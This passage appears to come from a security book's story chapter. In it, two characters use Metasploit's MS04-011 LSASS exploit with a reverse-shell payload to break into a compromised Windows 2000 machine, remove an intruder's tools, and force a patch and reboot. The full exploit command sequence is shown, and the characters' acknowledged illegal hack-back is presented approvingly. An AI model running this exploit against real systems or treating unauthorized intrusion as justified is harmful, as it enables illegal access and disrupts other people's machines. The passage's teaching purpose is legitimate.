Figure 9 The Metasploit Framework Console

After scanning the window and making mental notes of commands he was going to need to use later, David began by typing:

msf > show exploits

Figure 10 Searching for Exploits with Metasploit Framework

"Now that's pretty," Bryan said, looking at the list of exploits displayed in front of them.

"Yeah, it really is," replied David "We're going with the LSASS exploit right?"

"Yeah, we better go grab the patch. Pull up the info on the exploit."

msf > info lsass_ms04_011

Figure 11 Metasploit Framework's Information on the LSASS Exploit

The information on the LSASS exploit appeared in the console window. It had everything they needed to know about the vulnerability and how they could exploit it. David and Bryan made note of the required options for the exploit, as well as the MS TechNet URL.

"Drop that URL into the browser; the patch should be on there," Bryan said.

"I'm one step ahead of you," David said as he opened Firefox.

David input the URL into the address bar and quickly was greeted by the security bulletin for the LSASS stack overflow.

Figure 12 The Security Bulletin for the LSASS Stack Overflow

He scanned the document and found the patch download links close to the bottom of the screen. He clicked the link for Windows 2000, and the Download button on the page that followed.

David switched back to the Metasploit console and typed the command:

msf > use lsass_ms04_011

Well, he typed part of it. Metasploit console supports Tab completion. After a few letters and a quick stab of the Tab key, David pressed Enter. Now that he had chosen which exploit he planned to use, the msf prompt changed to include the name of the chosen exploit.

Figure 13 The Name of the Chosen Exploit Listed on Metasploit Framework Console

Not every exploit works with the same operating system. Obviously launching a Windows exploit against a Linux machine was pointless, although it happened all the time. But different exploits also worked differently, depending on the version of the target OS, as well as what level service pack was installed.

msf lsass_ms04_011 > show targets

Metasploit listed three options for targeting. David liked the fact that an automatic option was present in case the user wasn't certain of the OS running on the target, but he was almost certain he was dealing with a Windows 2000 machine, and he'd already downloaded the patch for that OS. He set the target to Windows 2000.

msf lsass_ms04_011 > set TARGET 1

Figure 14 Supported Exploit Targets Listed on Metasploit Framework Console

Now they needed a payload. Using the same logic behind the targeting of a system with a particular exploit, it also makes sense to use the proper payload for your target operating system. Metasploit takes care of this by allowing the user to see only those payloads that will function with the selected exploit.

msf lsass_ms04_011 > show payloads

Figure 15 Usable Payloads Listed on Metasploit Framework Console

David selected a Windows Reverse Shell payload. This would allow him to attach to the target system and then spawn a shell.

msf lsass_ms04_011 > set PAYLOAD win32_reverse

Once again the prompt changed to reflect not only the chosen exploit but also the payload that would be used.

Figure 16 Details of the Chosen Exploit and Usable Payload Listed on Metasploit Framework Console

Each exploit and payload requires different options to be set for the exploit and payload to function properly.

msf lsass_ms04_011(win32_reverse) > show options

Metasploit often set default options on several of the fields, although it always required a setting for the remote host. And in the case of the payload that David and Bryan had chosen, it required input for the listening host as well. David set these options using the following two commands:

msf lsass_ms04_011(win32_reverse) > set RHOST 172.18.6.4

msf lsass_ms04_011(win32_reverse) > set LHOST 69.256.12.214

Figure 17 Exploit and Payload Options Listed on Metasploit Framework Console

All that was left to do now was run the exploit.

"Ready?" asked David looking over at Bryan, who until now had sat quietly looking at the monitor with a small grin on his face.

"Ready? You mean to break the law? To risk our jobs and our livelihood because some hacker pissed you off?" Bryan asked quickly. "Yeah, I'm ready," he said nodding.

David looked at the blinking cursor. He took a deep breath, typed the last command, looked at Bryan, and pressed Enter.

msf lsass_ms04_011(win32_reverse) > exploit

In a few seconds they were greeted by the sight of a Windows command prompt, proudly displaying the operating system to be Windows 2000. This was definitely not the XP machine they had launched the attack from. They were in.

Figure 18 Windows Command Prompt Displayed on Metasploit Framework Console

They sat in silence, staring at the screen. Neither of them said a word until Bryan said what both of them were thinking.

"Sweet."

David immediately got to work, his fingers flying over the keyboard. He had renamed the patch from Windows2000-KB835732-x86-ENU.EXE to simply patch.exe and uploaded it to the system's root directory. He did a directory listing and noticed nmap, geth, and something called sys32drv.

"What the hell is sys32drv.exe?" David asked.

"Five bucks says it's netcat," laughed Bryan. "Type sys32drv32 –h really quick."

David typed the command and watched as the netcat help file scrolled onto the screen.

"You owe me five bucks," Bryan said.

"Hah, I never agreed."

"Well, kill that and delete the other tools."

"Consider it done."

With that, David removed each of the files the attacker had uploaded to the system. He got a certain satisfaction out of knowing that this attacker was going to be very confused when he tried to connect to this machine.

With the offending files removed from the machine he moved onto the patch:

C:\> patch.exe –q –f

This caused the patch to be installed in quiet mode so that no user interaction is needed, and when the patch had been installed, it was forced to reboot.

Sure, this was mildly evil. Forcing a reboot on a remote machine could cause the user to lose work or if it was hosting a Web server, the site might go down for a bit, but David didn't see any other option. Well, there was another option: -z would install the patch without requiring an immediate restart, but every second this machine wasn't restarted, it was a potential weapon used by an attacker on innocent users' networks. Forced reboot it is.

"That's it," David said. "Now we wait."

"How long until you think it will come back up?" asked Bryan.

"Could be a minute, or it could be 10."

David and Bryan waited patiently for 15 minutes, more than enough time for the remote machine to reboot, but they wanted to be sure. David pinged the machine; it was up.

David reopened the Metasploit console. He quickly typed the commands that he had meticulously chosen only minutes before.

msf > use lsass_ms04_011

msf lsass_ms04_011 > set TARGET 1

msf lsass_ms04_011 > set PAYLOAD win32_reverse

msf lsass_ms04_011(win32_reverse) > set RHOST 172.18.6.4

msf lsass_ms04_011(win32_reverse) > set LHOST 69.256.12.214

msf lsass_ms04_011(win32_reverse) > exploit

Six commands. That's what it took to break into the machine, only six simple commands. They watched as the Reverse Handler started and the exploit began. Only this time something was different. Rather than seeing [*] Got connection to 172.18.6.4:1030 and having a shell dropped in their lap, the Reverse Handler exited.

Figure 19 Starting Reverse Handler through Metasploit Framework Console

"It worked," Bryan said with a grin.

"Did you ever doubt it?" David asked.

"Yeah! I mean no! Hell, I don't know what I mean, but that's cool."

"Very."